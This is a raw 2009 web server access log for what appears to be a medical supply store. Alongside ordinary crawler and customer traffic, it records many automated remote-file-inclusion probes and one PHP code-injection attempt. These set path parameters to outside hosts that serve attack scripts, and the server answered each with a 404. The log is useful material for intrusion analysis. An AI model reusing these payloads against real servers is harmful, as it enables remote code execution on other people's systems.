209.59.12.99 - - [26/Jul/2009:07:28:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.23.158.226 - - [26/Jul/2009:07:28:13 -0400] "GET /logs/access_log.Q109052800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
74.6.22.169 - - [26/Jul/2009:07:28:53 -0400] "GET /images/_notes/contact_email_over.jpg.mno HTTP/1.0" 200 250 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
61.8.0.47 - - [26/Jul/2009:07:28:56 -0400] "GET /logs/access_log.Q109052800%20%20/?binn_include_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
61.8.0.47 - - [26/Jul/2009:07:29:38 -0400] "GET /logs/access_log.Q109071000/mail.inc.php?skin_board_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
61.8.0.47 - - [26/Jul/2009:07:30:25 -0400] "GET /logs/access_log.Q109052800%20%20/mail.inc.php?skin_board_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
61.8.0.47 - - [26/Jul/2009:07:30:28 -0400] "GET /logs/access_log.Q109071000%20%20/?binn_include_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
61.8.0.47 - - [26/Jul/2009:07:30:31 -0400] "GET /logs/access_log.Q109052800%20%20/mail.inc.php?skin_board_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
61.8.0.47 - - [26/Jul/2009:07:30:58 -0400] "GET /logs/access_log.Q109052800%20%20/mail.inc.php?skin_board_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
61.8.0.47 - - [26/Jul/2009:07:31:21 -0400] "GET /logs/access_log.Q109070200%20%20/?binn_include_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
61.8.0.47 - - [26/Jul/2009:07:31:39 -0400] "GET /logs/access_log.Q109071000%20%20/mail.inc.php?skin_board_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
61.8.0.47 - - [26/Jul/2009:07:31:40 -0400] "GET /logs/access_log.Q109071000%20%20/mail.inc.php?skin_board_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
89.234.7.92 - - [26/Jul/2009:07:31:51 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
89.234.7.92 - - [26/Jul/2009:07:31:51 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
89.234.7.92 - - [26/Jul/2009:07:31:51 -0400] "GET /logs/access_log.Q109070800//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
89.234.7.92 - - [26/Jul/2009:07:31:54 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
89.234.7.92 - - [26/Jul/2009:07:31:54 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
89.234.7.92 - - [26/Jul/2009:07:31:54 -0400] "GET /logs/access_log.Q109070800//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:07:32:08 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:07:32:08 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
61.8.0.47 - - [26/Jul/2009:07:32:08 -0400] "GET /logs/access_log.Q109071000%20%20/mail.inc.php?skin_board_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:07:32:08 -0400] "GET //include/admin.lib.inc.php?site_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:07:32:08 -0400] "GET /logs/access_log.Q109070800//include/admin.lib.inc.php?site_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:07:32:19 -0400] "GET /images/_notes/nav_store_history_off_r1_c4.jpg.mno HTTP/1.1" 200 210 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
61.8.0.47 - - [26/Jul/2009:07:32:26 -0400] "GET /logs/access_log.Q109051100%20%20/?binn_include_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
61.8.0.47 - - [26/Jul/2009:07:32:32 -0400] "GET /logs/access_log.Q109071100%20%20/?binn_include_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
110.45.138.139 - - [26/Jul/2009:07:32:59 -0400] "GET /logs/access_log.Q109051500%20%20//include/print_category.php?setup[use_category]=1&dir=http://onsoccer.ca/copyme.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
61.8.0.47 - - [26/Jul/2009:07:33:00 -0400] "GET /logs/access_log.Q109070200%20%20/mail.inc.php?skin_board_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
173.19.87.221 - - [26/Jul/2009:07:33:00 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)"
173.19.87.221 - - [26/Jul/2009:07:33:00 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)"
209.59.12.99 - - [26/Jul/2009:07:33:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.8.0.47 - - [26/Jul/2009:07:33:05 -0400] "GET /logs/access_log.Q109070200%20%20/mail.inc.php?skin_board_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
110.45.138.139 - - [26/Jul/2009:07:33:06 -0400] "GET /logs/access_log.Q109051700%20%20//include/print_category.php?setup[use_category]=1&dir=http://onsoccer.ca/copyme.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
61.8.0.47 - - [26/Jul/2009:07:33:13 -0400] "GET /logs/access_log.Q109060100%20%20/?binn_include_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
173.19.87.221 - - [26/Jul/2009:07:33:15 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)"
173.19.87.221 - - [26/Jul/2009:07:33:16 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)"
173.19.87.221 - - [26/Jul/2009:07:33:16 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Debactoral HTTP/1.1" 200 38020 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)"
65.23.158.226 - - [26/Jul/2009:07:33:17 -0400] "GET /logs/access_log.Q109050700%20%20//include/admin.lib.inc.php?site_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:07:33:22 -0400] "GET /logs/access_log.Q109070800%20%20//include/admin.lib.inc.php?site_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
173.19.87.221 - - [26/Jul/2009:07:33:32 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Debactoral" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)"
173.19.87.221 - - [26/Jul/2009:07:33:32 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Debactoral" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)"
173.19.87.221 - - [26/Jul/2009:07:33:32 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Debactoral" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)"
173.19.87.221 - - [26/Jul/2009:07:33:32 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Debactoral" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)"
173.19.87.221 - - [26/Jul/2009:07:33:32 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Debactoral" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)"
173.19.87.221 - - [26/Jul/2009:07:33:32 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Debactoral" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)"
173.19.87.221 - - [26/Jul/2009:07:33:32 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Debactoral" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)"
61.8.0.47 - - [26/Jul/2009:07:33:32 -0400] "GET /logs/access_log.Q109070200%20%20/mail.inc.php?skin_board_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
173.19.87.221 - - [26/Jul/2009:07:33:32 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Debactoral" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)"
173.19.87.221 - - [26/Jul/2009:07:33:32 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Debactoral" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)"
173.19.87.221 - - [26/Jul/2009:07:33:33 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Debactoral" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)"
173.19.87.221 - - [26/Jul/2009:07:33:33 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Debactoral" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)"
173.19.87.221 - - [26/Jul/2009:07:33:33 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Debactoral" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)"
173.19.87.221 - - [26/Jul/2009:07:33:33 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Debactoral" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)"
173.19.87.221 - - [26/Jul/2009:07:33:38 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Debactoral" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)"
173.19.87.221 - - [26/Jul/2009:07:33:39 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)"
173.19.87.221 - - [26/Jul/2009:07:33:43 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)"
89.234.7.92 - - [26/Jul/2009:07:33:49 -0400] "GET /logs/access_log.Q109070900//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:07:33:50 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:07:33:50 -0400] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:07:33:50 -0400] "GET /logs/access_log.Q109062900/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
89.234.7.92 - - [26/Jul/2009:07:33:53 -0400] "GET /logs/access_log.Q109070900//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:07:33:57 -0400] "GET /images/over-store_syringe_section.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
61.8.0.47 - - [26/Jul/2009:07:34:05 -0400] "GET /logs/access_log.Q109051100%20%20/mail.inc.php?skin_board_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
61.8.0.47 - - [26/Jul/2009:07:34:11 -0400] "GET /logs/access_log.Q109051100%20%20/mail.inc.php?skin_board_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
61.8.0.47 - - [26/Jul/2009:07:34:14 -0400] "GET /logs/access_log.Q109071100%20%20/mail.inc.php?skin_board_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
61.8.0.47 - - [26/Jul/2009:07:34:19 -0400] "GET /logs/access_log.Q109071100%20%20/mail.inc.php?skin_board_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
61.8.0.47 - - [26/Jul/2009:07:34:38 -0400] "GET /logs/access_log.Q109051100%20%20/mail.inc.php?skin_board_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
61.8.0.47 - - [26/Jul/2009:07:34:43 -0400] "GET /logs/access_log.Q109071100%20%20/mail.inc.php?skin_board_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:07:34:43 -0400] "GET /logs/access_log.Q109061300%20%20//modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
61.8.0.47 - - [26/Jul/2009:07:34:53 -0400] "GET /logs/access_log.Q109060100%20%20/mail.inc.php?skin_board_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
61.8.0.47 - - [26/Jul/2009:07:34:55 -0400] "GET /logs/access_log.Q109060100%20%20/mail.inc.php?skin_board_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:07:35:02 -0400] "GET /logs/access_log.Q109062100%20%20//modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
61.8.0.47 - - [26/Jul/2009:07:35:32 -0400] "GET /logs/access_log.Q109060100%20%20/mail.inc.php?skin_board_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
61.8.0.47 - - [26/Jul/2009:07:35:34 -0400] "GET /logs/access_log.Q109071000/?binn_include_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:07:36:51 -0400] "GET /logs/access_log.Q109062900%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
81.169.137.253 - - [26/Jul/2009:07:36:55 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.ips.gov.py/newsletter/include/lang/fx29id.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
81.169.137.253 - - [26/Jul/2009:07:36:55 -0400] "GET /logs/access_log.Q109063000//include/print_category.php?setup[use_category]=1&dir=http://www.ips.gov.py/newsletter/include/lang/fx29id.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
81.169.137.253 - - [26/Jul/2009:07:36:55 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.ips.gov.py/newsletter/include/lang/fx29id.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
61.8.0.47 - - [26/Jul/2009:07:37:01 -0400] "GET /logs/access_log.Q109071000/mail.inc.php?skin_board_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:07:37:32 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:07:37:32 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:07:37:32 -0400] "GET /logs/access_log.Q109053100%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:07:37:52 -0400] "GET /logs/access_log.Q109050900%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:07:37:52 -0400] "GET /logs/access_log.Q109070800%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Jul/2009:07:38:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.20.186.139 - - [26/Jul/2009:07:38:50 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:07:38:50 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:07:38:50 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:07:38:54 -0400] "GET /images/_notes/nav_home_temp_on.jpg.mno HTTP/1.1" 200 251 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.232.145.150 - - [26/Jul/2009:07:39:38 -0400] "GET /logs/error_log.Q109061900%20/appserv/main.php?appserv_root=http://220.130.180.180/aDu/ManieZ.jpg???? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
66.232.145.150 - - [26/Jul/2009:07:39:38 -0400] "GET /appserv/main.php?appserv_root=http://220.130.180.180/aDu/ManieZ.jpg???? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
66.232.145.150 - - [26/Jul/2009:07:39:38 -0400] "GET /logs/appserv/main.php?appserv_root=http://220.130.180.180/aDu/ManieZ.jpg???? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
61.109.250.29 - - [26/Jul/2009:07:39:49 -0400] "GET /logs/access_log.Q109061900///?_SERVER%5BDOCUMENT_ROOT%5D=http://ohyunbook.com/rgboard/data/neter/fxid.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
81.169.137.253 - - [26/Jul/2009:07:40:24 -0400] "GET /logs/access_log.Q109063000//include/print_category.php?setup[use_category]=1&dir=http://www.ips.gov.py/newsletter/include/lang/fx29id.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
81.169.137.253 - - [26/Jul/2009:07:40:24 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.ips.gov.py/newsletter/include/lang/fx29id.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
81.169.137.253 - - [26/Jul/2009:07:40:25 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.ips.gov.py/newsletter/include/lang/fx29id.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:07:40:30 -0400] "GET //tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:07:40:30 -0400] "GET /logs/access_log.Q109062500//tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:07:40:30 -0400] "GET /logs//tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
208.113.167.8 - - [26/Jul/2009:07:40:38 -0400] "GET //include/admin.lib.inc.php?site_path=http://tikihub.com/ray/idd.swf??? HTTP/1.1" 404 224 "-" "libwww-perl/5.803"
208.113.167.8 - - [26/Jul/2009:07:40:38 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://tikihub.com/ray/idd.swf??? HTTP/1.1" 404 229 "-" "libwww-perl/5.803"
208.113.167.8 - - [26/Jul/2009:07:40:38 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://tikihub.com/ray/idd.swf??? HTTP/1.1" 404 251 "-" "libwww-perl/5.803"
208.113.167.8 - - [26/Jul/2009:07:40:43 -0400] "GET /logs/access_log.Q109070800//include/admin.lib.inc.php?site_path=http://tikihub.com/ray/idd.swf??? HTTP/1.1" 404 251 "-" "libwww-perl/5.803"
125.241.54.8 - - [26/Jul/2009:07:40:53 -0400] "GET /logs/access_log.Q109062800//tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
89.234.7.92 - - [26/Jul/2009:07:41:01 -0400] "GET /logs/access_log.Q109070800%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:07:41:05 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:07:41:05 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
